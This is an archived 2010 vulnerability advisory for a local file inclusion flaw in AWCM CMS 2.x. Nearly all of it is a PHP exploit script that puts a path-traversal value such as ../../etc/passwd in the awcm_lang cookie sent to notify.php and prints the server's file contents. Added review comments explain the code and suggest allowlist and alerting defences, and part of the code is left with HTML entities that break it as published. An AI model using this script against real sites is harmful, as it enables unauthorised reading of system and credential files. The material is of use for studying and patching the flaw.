Securityvulns — SECURITYVULNS:DOC:24052
History: Jun 14, 2010 - 12:00 a.m.

Awcm Cms Local File Inclusion Vulnerability

2010-06-14 00:00:00
vulners.com
8

Author: SwEET-DeViL

Published: 10-6-2010

Software Link: http://www.awcm-cms.com/

Download Software: http://sourceforge.net/projects/awcm/

Version: 2.x

Tested on: Linux

Exploit :

<?php
// Proof-of-concept client for the AWCM CMS 2.x local file inclusion advisory above.
// It sends a single HTTP GET for notify.php?v=a to the given host, with the third
// command-line argument placed in the awcm_lang cookie, then prints whatever text
// follows the closing head tag of the response.
//
// NOTE(review): the vulnerable server-side code is not shown on this page; presumably
// the awcm_lang cookie value is used to build an include path -- confirm against the
// AWCM source. Defensive takeaways: resolve the language cookie against a fixed
// allowlist of installed language names instead of using it in a file path, and
// alert on requests whose awcm_lang cookie contains path separators or dot-dot segments.
//
// NOTE(review): the lines from the $CURL_in assignment through the 406 check carry
// HTML entities (&quot;, &#40;, &#92; ...) left by the page rendering; they are kept
// exactly as published and are not valid PHP in this form.

// Usage banner; printed unconditionally, before any argument is checked.
print("

| Awcm Cms Local File Inclusion Vulnerability
| By SwEET-DeViL
| x0.root(at)gmail.com
| example
|

Exploit.php ".$argv[0]." example.com /path/ …/…/…/…/…/…/…/…/etc/passwd
");
// argv[1] is the host name and argv[2] the URL path, following the banner's example.
$host =$argv[1];//;
// The request line below uses this absolute URL (scheme + host + path).
$Path = "http://".$host.$argv[2];
   // Hand-built HTTP/1.0 request. argv[3] is concatenated into the Cookie header
   // as-is, with no encoding or validation on the client side.
   $CURL_in =&quot;GET &quot;.$Path.&quot;/notify.php?v=a HTTP/1.0&#92;r&#92;n&quot;;
   $CURL_in.=&quot;User-Agent: Mozilla/4.0 &#40;compatible; MSIE 7.0; Windows NT 5.1&#41;&#92;r&#92;n&quot;;
   $CURL_in.=&quot;Pragma: no-cache&#92;r&#92;n&quot;;
   $CURL_in.=&quot;Cookie: awcm_lang=&quot;.$argv[3].&quot;&quot;.&quot;;&#92;r&#92;n&quot;;
   $CURL_in.=&quot;Connection: Close&#92;r&#92;n&#92;r&#92;n&quot;;

   // The argument check runs only after the request string has been built; a missing
   // or empty argv[3] stops the script with a generic failure message.
   if &#40; empty&#40;$argv[3]&#41; &#41;{
           echo &quot;&#92;n[-] Error : Exploit failed&#92;n&quot;;
           die;
   }

   // Plain TCP connection to port 80. The @ operator suppresses the connection
   // warning, so only the message below is shown on failure.
   $FoN = @fsockopen&#40;$host, 80&#41;;
   if&#40;!$FoN&#41;{
           echo &quot;&#92;n[-] Error : Can&#39;t connect to &quot;.$host.&quot; !!&#92;n&quot;;
           die;
   }

   // Send the request and read the whole response in 1024-byte chunks.
   // $data is never initialised before the first .= (undefined-variable
   // notice or warning, depending on the PHP version).
   fputs&#40;$FoN, $CURL_in&#41;;
   while &#40;!feof&#40;$FoN&#41;&#41; $data .= fread&#40;$FoN, 1024&#41;;
   fclose&#40;$FoN&#41;;

   // Both status checks match only an HTTP/1.1 status line; any other status
   // (or an HTTP/1.0 status line) falls through to the body parsing below.
   $error_1 = strstr&#40; $data, &quot;HTTP/1.1 404 Not Found&quot; &#41;;
   if &#40; !empty&#40;$error_1&#41; &#41;{
           echo &quot;&#92;n[-] Error : 404 Not Found. &#92;n&quot;;
           die;
   }

   $error_2 = strstr&#40; $data, &quot;HTTP/1.1 406 Not Acceptable&quot; &#41;;
   if &#40; !empty&#40;$error_2&#41; &#41;{
           echo &quot;&#92;n[-] Error : 406 Not Acceptable. &#92;n&quot;;
           die;
   }

// Take the part of the response after the first closing head tag, cut it at the next
// opening head tag if one appears, strip HTML tags and remove CR/TAB characters.
// NOTE(review): when the response has no closing head tag, $EXc[1] does not exist.
$EXc = explode("</head>",$data);
$EXx = explode("<head>",$EXc[1]);
$CODE = strip_tags($EXx[0]);
$CODE2 = preg_replace("/\r|\t/",'',$CODE);
$CODE2 = trim($CODE2);

// An empty result is reported as "file not found"; otherwise the extracted text is
// printed after a [+] marker.
if (empty($CODE2)){
print ('

[-] Error : Sorry! File not Found

');
}else{
print ('
[+]

').$CODE2;

print ('


');

}

?>